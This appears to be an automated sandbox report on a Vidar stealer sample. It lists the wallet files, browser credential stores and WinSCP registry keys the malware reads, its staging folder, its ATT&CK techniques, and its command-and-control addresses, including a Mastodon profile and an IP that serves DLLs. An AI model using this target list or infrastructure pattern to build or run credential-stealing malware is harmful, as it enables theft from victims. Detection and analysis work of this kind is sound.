Source: Yara match	File source: 1.2.T6zZFfRLqs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.T6zZFfRLqs.exe.21f0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.T6zZFfRLqs.exe.21f0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.T6zZFfRLqs.exe.2330000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.T6zZFfRLqs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.T6zZFfRLqs.exe.2330000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.397914082.00000000021F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.361677453.0000000002330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: T6zZFfRLqs.exe PID: 6576, type: MEMORYSTR

Tries to steal Crypto Currency Wallets

Show sources

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\?i??	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\?i??	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\?????i	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\?????i	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?????	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?????	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?????	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?????	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: T6zZFfRLqs.exe, 00000001.00000002.398466099.000000000309E000.00000004.00000001.sdmp	String found in binary or memory: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Wallets\ElectrumLTCxtNT
Source: T6zZFfRLqs.exe, 00000001.00000002.398466099.000000000309E000.00000004.00000001.sdmp	String found in binary or memory: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Wallets\ElectronCashtxtO
Source: T6zZFfRLqs.exe	String found in binary or memory: JaxxLiberty
Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\window-state.jsonw
Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\
Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.seco01]
Source: T6zZFfRLqs.exe, 00000001.00000002.398466099.000000000309E000.00000004.00000001.sdmp	String found in binary or memory: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Wallets\ElectrumLTCxtNT
Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?????
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystoreb
Source: T6zZFfRLqs.exe, 00000001.00000002.398466099.000000000309E000.00000004.00000001.sdmp	String found in binary or memory: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Wallets\ExodusENT
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystoreb
Source: T6zZFfRLqs.exe, 00000001.00000002.398466099.000000000309E000.00000004.00000001.sdmp	String found in binary or memory: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Wallets\MultiDogeENTCURRENTr
Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.seco01]
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystoreb
Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\?i??'

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior

Source: Yara match	File source: 00000001.00000002.397797115.00000000007E2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: T6zZFfRLqs.exe PID: 6576, type: MEMORYSTR

Remote Access Functionality:

Yara detected Vidar

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 1.2.T6zZFfRLqs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.T6zZFfRLqs.exe.21f0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.T6zZFfRLqs.exe.21f0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.T6zZFfRLqs.exe.2330000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.T6zZFfRLqs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.T6zZFfRLqs.exe.2330000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.397914082.00000000021F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.361677453.0000000002330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: T6zZFfRLqs.exe PID: 6576, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Application Shimming1	Application Shimming1	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection11	Deobfuscate/Decode Files or Information1	Credentials in Registry1	Account Discovery1	Remote Desktop Protocol	Data from Local System3	Exfiltration Over Bluetooth	Encrypted Channel21	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery4	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing23	NTDS	System Information Discovery56	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol14	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion1	LSA Secrets	Security Software Discovery21	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Virtualization/Sandbox Evasion1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion1	DCSync	Process Discovery12	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection11	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
T6zZFfRLqs.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\ProgramData\freebl3.dll	0%	Metadefender	Browse
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	3%	Metadefender	Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Metadefender	Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Metadefender	Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Metadefender	Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Metadefender	Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\mozglue[1].dll	3%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\softokn3[1].dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.T6zZFfRLqs.exe.21f0e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen		Download File
1.3.T6zZFfRLqs.exe.2330000.0.unpack	100%	Avira	TR/Patched.Ren.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
mas.to	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://23.88.105.196/nss3.dll	0%	Avira URL Cloud	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://23.88.105.196/freebl3.dll	0%	Avira URL Cloud	safe
https://mas.to	0%	Avira URL Cloud	safe
http://23.88.105.196/mozglue.dll$	0%	Avira URL Cloud	safe
https://mas.to/users/killern0	0%	Avira URL Cloud	safe
http://23.88.105.196/msvcp140.dll	0%	Avira URL Cloud	safe
https://mas.to/users/killern0/following	0%	Avira URL Cloud	safe
http://23.88.105.196/mozglue.dll	0%	Avira URL Cloud	safe
http://23.88.105.196/softokn3.dll	0%	Avira URL Cloud	safe
https://mas.to/avatars/original/missing.png	0%	Avira URL Cloud	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://23.88.105.196/vcruntime140.dll	0%	Avira URL Cloud	safe
https://mas.to/	0%	Avira URL Cloud	safe
https://media.mas.to/masto-public/site_uploads/files/000/000/003/original/elephant_ui_plane-e3f2d57c	0%	Avira URL Cloud	safe
http://23.88.105.196/	0%	Avira URL Cloud	safe
http://23.88.105.196/nss3.dllO	0%	Avira URL Cloud	safe
http://23.88.105.196/1008	0%	Avira URL Cloud	safe
http://service.real.cop	0%	Avira URL Cloud	safe
https://mas.to/users/killern0/followers	0%	Avira URL Cloud	safe
https://media.mas.to	0%	Avira URL Cloud	safe
https://mas.to/@killern0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mas.to	88.99.75.82	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://23.88.105.196/nss3.dll	false	Avira URL Cloud: safe	unknown
http://23.88.105.196/freebl3.dll	false	Avira URL Cloud: safe	unknown
http://23.88.105.196/msvcp140.dll	false	Avira URL Cloud: safe	unknown
http://23.88.105.196/mozglue.dll	false	Avira URL Cloud: safe	unknown
http://23.88.105.196/softokn3.dll	false	Avira URL Cloud: safe	unknown
http://23.88.105.196/vcruntime140.dll	false	Avira URL Cloud: safe	unknown
http://23.88.105.196/	false	Avira URL Cloud: safe	unknown
http://23.88.105.196/1008	false	Avira URL Cloud: safe	unknown
https://mas.to/@killern0	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	temp.1.dr	false		high
http://www.mozilla.com/en-US/blocklist/	mozglue[1].dll.1.dr	false		high
https://duckduckgo.com/ac/?q=	temp.1.dr	false		high
https://support.google.com/chrome/?p=plugin_wmp	T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	temp.1.dr	false		high
https://support.google.com/chrome/?p=plugin	T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp	false		high
http://ocsp.thawte.com0	nss3[1].dll.1.dr	false	URL Reputation: safe	unknown
http://www.mozilla.com0	nss3[1].dll.1.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	temp.1.dr	false		high
https://mas.to	T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	temp.1.dr	false		high
http://23.88.105.196/mozglue.dll$	T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://mas.to/users/killern0	T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/tootsuite/mastodon	T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp	false		high
https://joinmastodon.org/apps	T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	temp.1.dr	false		high
https://support.google.com/chrome/?p=plugin_real	T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp	false		high
https://mas.to/users/killern0/following	T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://mas.to/avatars/original/missing.png	T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	nss3[1].dll.1.dr	false		high
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://mas.to/	T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://media.mas.to/masto-public/site_uploads/files/000/000/003/original/elephant_ui_plane-e3f2d57c	T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtabSQLite	temp.1.dr	false		high
http://23.88.105.196/nss3.dllO	T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://service.real.cop	T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://forms.real.com/real/realone/download.html?type=rpsp_us	T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	temp.1.dr	false		high
https://mas.to/users/killern0/followers	T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://media.mas.to	T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://download.divx.com/plp	T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	temp.1.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
88.99.75.82	mas.to	Germany		24940	HETZNER-ASDE	false
23.88.105.196	unknown	United States		18978	ENZUINC-US	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	491601
Start date:	27.09.2021
Start time:	18:31:58
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	T6zZFfRLqs.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/18@1/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 89% Number of executed functions: 74 Number of non-executed functions: 42
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.50.102.62, 23.0.174.200, 23.0.174.185, 20.54.110.249, 40.112.88.60, 20.82.210.154, 23.10.249.43, 23.10.249.26, 95.100.54.203 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
88.99.75.82	nY67wl47QZ.exe	Get hash	malicious	Browse
	OfE705GyPZ.exe	Get hash	malicious	Browse
	W7fb1ECIQA.exe	Get hash	malicious	Browse
	R9LbEnIk0s.exe	Get hash	malicious	Browse
	7XmWGse79x.exe	Get hash	malicious	Browse
	m5W1BZQU4m.exe	Get hash	malicious	Browse
	hHsIHUGICB.exe	Get hash	malicious	Browse
	NOgYb2fHbO.exe	Get hash	malicious	Browse
	VwDvbAowp0.exe	Get hash	malicious	Browse
	lXy3MnXJ83.exe	Get hash	malicious	Browse
	SebwAujas5.exe	Get hash	malicious	Browse
	nxW9yUgdYM.exe	Get hash	malicious	Browse
	cxBR3cCGTw.exe	Get hash	malicious	Browse
	k5THcVgINl.exe	Get hash	malicious	Browse
	b2i2IopgOC.exe	Get hash	malicious	Browse
	G2BPn4a7o1.exe	Get hash	malicious	Browse
	qOsCIQD1uR.exe	Get hash	malicious	Browse
	NC7bm1PoKj.exe	Get hash	malicious	Browse
	p0FDRanFUE.exe	Get hash	malicious	Browse
	Tt5xbxWwsb.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
mas.to	nY67wl47QZ.exe	Get hash	malicious	Browse	88.99.75.82
	OfE705GyPZ.exe	Get hash	malicious	Browse	88.99.75.82
	W7fb1ECIQA.exe	Get hash	malicious	Browse	88.99.75.82
	R9LbEnIk0s.exe	Get hash	malicious	Browse	88.99.75.82
	7XmWGse79x.exe	Get hash	malicious	Browse	88.99.75.82
	m5W1BZQU4m.exe	Get hash	malicious	Browse	88.99.75.82
	hHsIHUGICB.exe	Get hash	malicious	Browse	88.99.75.82
	NOgYb2fHbO.exe	Get hash	malicious	Browse	88.99.75.82
	VwDvbAowp0.exe	Get hash	malicious	Browse	88.99.75.82
	lXy3MnXJ83.exe	Get hash	malicious	Browse	88.99.75.82
	SebwAujas5.exe	Get hash	malicious	Browse	88.99.75.82
	nxW9yUgdYM.exe	Get hash	malicious	Browse	88.99.75.82
	cxBR3cCGTw.exe	Get hash	malicious	Browse	88.99.75.82
	k5THcVgINl.exe	Get hash	malicious	Browse	88.99.75.82
	b2i2IopgOC.exe	Get hash	malicious	Browse	88.99.75.82
	G2BPn4a7o1.exe	Get hash	malicious	Browse	88.99.75.82
	qOsCIQD1uR.exe	Get hash	malicious	Browse	88.99.75.82
	NC7bm1PoKj.exe	Get hash	malicious	Browse	88.99.75.82
	p0FDRanFUE.exe	Get hash	malicious	Browse	88.99.75.82
	Tt5xbxWwsb.exe	Get hash	malicious	Browse	88.99.75.82

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	nY67wl47QZ.exe	Get hash	malicious	Browse	88.99.75.82
	OfE705GyPZ.exe	Get hash	malicious	Browse	88.99.75.82
	W7fb1ECIQA.exe	Get hash	malicious	Browse	88.99.75.82
	R9LbEnIk0s.exe	Get hash	malicious	Browse	88.99.75.82
	qOthJCpJ8E.exe	Get hash	malicious	Browse	135.181.211.109
	7XmWGse79x.exe	Get hash	malicious	Browse	88.99.75.82
	m5W1BZQU4m.exe	Get hash	malicious	Browse	88.99.75.82
	hHsIHUGICB.exe	Get hash	malicious	Browse	88.99.75.82
	NOgYb2fHbO.exe	Get hash	malicious	Browse	88.99.75.82
	vKTd7I2OdfBzkW2.exe	Get hash	malicious	Browse	136.243.159.53
	VwDvbAowp0.exe	Get hash	malicious	Browse	88.99.75.82
	lXy3MnXJ83.exe	Get hash	malicious	Browse	88.99.75.82
	SebwAujas5.exe	Get hash	malicious	Browse	88.99.75.82
	nxW9yUgdYM.exe	Get hash	malicious	Browse	88.99.75.82
	Ov3tXE6rdw.exe	Get hash	malicious	Browse	168.119.93.163
	cxBR3cCGTw.exe	Get hash	malicious	Browse	88.99.75.82
	Confirmation de cdeclient_5045009.xlsx	Get hash	malicious	Browse	168.119.93.163
	KI7JhXnhm9.exe	Get hash	malicious	Browse	136.243.159.53
	k5THcVgINl.exe	Get hash	malicious	Browse	88.99.75.82
	b2i2IopgOC.exe	Get hash	malicious	Browse	88.99.75.82
ENZUINC-US	nY67wl47QZ.exe	Get hash	malicious	Browse	23.88.105.196
	OfE705GyPZ.exe	Get hash	malicious	Browse	23.88.105.196
	W7fb1ECIQA.exe	Get hash	malicious	Browse	23.88.105.196
	R9LbEnIk0s.exe	Get hash	malicious	Browse	23.88.105.196
	7XmWGse79x.exe	Get hash	malicious	Browse	23.88.105.196
	m5W1BZQU4m.exe	Get hash	malicious	Browse	23.88.105.196
	hHsIHUGICB.exe	Get hash	malicious	Browse	23.88.105.196
	NOgYb2fHbO.exe	Get hash	malicious	Browse	23.88.105.196
	VwDvbAowp0.exe	Get hash	malicious	Browse	23.88.105.196
	lXy3MnXJ83.exe	Get hash	malicious	Browse	23.88.105.196
	SebwAujas5.exe	Get hash	malicious	Browse	23.88.105.196
	nxW9yUgdYM.exe	Get hash	malicious	Browse	23.88.105.196
	cxBR3cCGTw.exe	Get hash	malicious	Browse	23.88.105.196
	k5THcVgINl.exe	Get hash	malicious	Browse	23.88.105.196
	b2i2IopgOC.exe	Get hash	malicious	Browse	23.88.105.196
	G2BPn4a7o1.exe	Get hash	malicious	Browse	23.88.105.196
	qOsCIQD1uR.exe	Get hash	malicious	Browse	23.88.105.196
	NC7bm1PoKj.exe	Get hash	malicious	Browse	23.88.105.196
	p0FDRanFUE.exe	Get hash	malicious	Browse	23.88.105.196
	Tt5xbxWwsb.exe	Get hash	malicious	Browse	23.88.105.196

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	InvPixcareer.-43329_20210927.xlsb	Get hash	malicious	Browse	88.99.75.82
	nY67wl47QZ.exe	Get hash	malicious	Browse	88.99.75.82
	OfE705GyPZ.exe	Get hash	malicious	Browse	88.99.75.82
	W7fb1ECIQA.exe	Get hash	malicious	Browse	88.99.75.82
	R9LbEnIk0s.exe	Get hash	malicious	Browse	88.99.75.82
	payment confirmation.exe	Get hash	malicious	Browse	88.99.75.82
	recital-239880844.xls	Get hash	malicious	Browse	88.99.75.82
	Unreal.exe	Get hash	malicious	Browse	88.99.75.82
	Silver_Light_Group_DOC03027321122.exe	Get hash	malicious	Browse	88.99.75.82
	7XmWGse79x.exe	Get hash	malicious	Browse	88.99.75.82
	m5W1BZQU4m.exe	Get hash	malicious	Browse	88.99.75.82
	hHsIHUGICB.exe	Get hash	malicious	Browse	88.99.75.82
	NOgYb2fHbO.exe	Get hash	malicious	Browse	88.99.75.82
	VwDvbAowp0.exe	Get hash	malicious	Browse	88.99.75.82
	lXy3MnXJ83.exe	Get hash	malicious	Browse	88.99.75.82
	BXTOD28N3I.exe	Get hash	malicious	Browse	88.99.75.82
	Kapitu.exe	Get hash	malicious	Browse	88.99.75.82
	SebwAujas5.exe	Get hash	malicious	Browse	88.99.75.82
	nxW9yUgdYM.exe	Get hash	malicious	Browse	88.99.75.82
	Payment_Advice.exe	Get hash	malicious	Browse	88.99.75.82

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\ProgramData\freebl3.dll	nY67wl47QZ.exe	Get hash	malicious	Browse
	OfE705GyPZ.exe	Get hash	malicious	Browse
